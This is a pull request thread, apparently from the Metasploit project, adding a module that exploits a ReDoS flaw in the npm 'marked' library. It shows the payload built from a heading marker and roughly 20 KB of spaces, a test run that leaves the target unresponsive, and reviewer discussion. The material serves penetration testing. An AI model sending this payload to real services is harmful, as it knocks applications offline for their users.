### PR TITLE
Adding npm component "marked" ReDoS module

### PR DESCRIPTION
**Pull request by nstarke**
This commit adds a module for the npm component
"marked" which exploits a Regular Expression
Denial of Service (ReDoS) vulnerability in the
"heading" regular expression.  Also included
is the documentation markdown for this module.

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

Documentation file included, please see this file for instructions

### CODE REVIEW

File: modules/auxiliary/dos/http/marked_redos.rb [hunk 1]
```diff
@@ -0,0 +1,118 @@
...
+      'Description' => %q{
+        This module exploits a Regular Expression Denial of Service vulnerability
+        in the npm module "marked". The vulnerable portion of code that this module
+        targets is in the "heading" regular expression. Web applications that use
+        "marked" for generating html from markdown are vulnerable. Versions up to
+        0.4.0 are vulnerable.
+      },
+      'References'  =>
+        [
+          ['URL', 'https://blog.sonatype.com/cve-2017-17461-vulnerable-or-not'],
```
Comment (bcoles) [inline modules/auxiliary/dos/http/marked_redos.rb]: `['URL', 'https://github.com/storybooks/marksy/issues/52'],`

Is there a CVE for this issue? CVE-2017-17461 or CVE-2017-17461 ? It looks like the former was rejected.

File: modules/auxiliary/dos/http/marked_redos.rb [hunk 2]
```diff
@@ -0,0 +1,118 @@
...
+    register_options([
+      Opt::RPORT(80),
+      OptString.new('HTTP_METHOD', [true, 'The default HTTP Verb to use', 'GET']),
+      OptString.new('HTTP_PARAMETER', [true, 'The vulnerable HTTP parameters', '']),
+      OptString.new('URI', [true, 'The URL Path to use', '/'])
+    ])
+  end
+
+  def run
+    unless test_service
```
Comment (bcoles) [inline modules/auxiliary/dos/http/marked_redos.rb]: Prefer positive condition first when using `if`/`else` conditional.

File: modules/auxiliary/dos/http/marked_redos.rb [hunk 3]
```diff
@@ -0,0 +1,118 @@
...
+        'uri' => datastore['URI'],
+        'method' => datastore['HTTP_METHOD'],
+          ("vars_#{datastore['HTTP_METHOD'].downcase}") => {
+            datastore['HTTP_PARAMETER'] =>  "# #" + (" " * 20 * 1024) + Rex::Text.rand_text_alpha(1)
+        }
+      }
+
+      res = send_request_cgi(params)
+
+      if res.nil?
```
Comment (bcoles) [inline modules/auxiliary/dos/http/marked_redos.rb]: Personal preference. Suggest:

```ruby
      unless res.nil?
        fail_with(Failure::Unknown, "ReDoS request unsuccessful. Received status #{res.code} from #{peer}.")
      end

      print_status("No response received from #{peer}, service is most likely unresponsive.")
```

File: modules/auxiliary/dos/http/marked_redos.rb (hunk 1 above)
Comment (nstarke) [reply modules/auxiliary/dos/http/marked_redos.rb]: The CVE was rejected by the project at the request of the original reporters; we later found that the originally reported payload would not exploit the issue, but that a different payload we developed internally could.  We worked with the project to get it fixed but never received a response on re-opening the CVE for this item, so we identified it internally as distinct.  Given that novel of an explanation, would you still like for me to add CVE-2017-17461 to the module as a reference?

**Comment by nstarke** [comment]
Apologies for the delay in updating this PR - I may not be able to get an update out for a few more days, unfortunately.  Just wanted to let you know so you didn't think I had abandoned this PR :-) Thanks!

**Comment by nstarke** [comment]
uh oh, seems like this PR is in Limbo land.  @bcoles can you advise on any other changes that potentially need to be made?

**Comment by nstarke** [comment]
Hello, I would like to get this merged, @wvu-r7 or @bcoles can you halp?  Thank you!

**Comment by wvu-r7** [comment]
I'll give it a go now that I'm back from summer camp!

**Comment by wvu-r7** [comment]
```
msf5 auxiliary(dos/http/marked_redos) > run

[*] Testing Service to make sure it is working.
[*] Test request successful, attempting to send payload. Server returned 404
[*] Sending ReDoS request to 172.28.128.4:3000.
[*] No response received from 172.28.128.4:3000, service is most likely unresponsive.
[*] Testing for service unresponsiveness.
[+] Service not responding.
[*] Auxiliary module execution completed
msf5 auxiliary(dos/http/marked_redos) >
```

**Comment by wvu-r7** [comment]
https://github.com/rapid7/metasploit-framework/commit/3c1befdacb227ca0ed3bfda8d4c63e547595179d

**Comment by wvu-r7** [comment]
# Release Notes

This adds a regular expression denial of service module against the npm "marked" component.

**Pull request merged**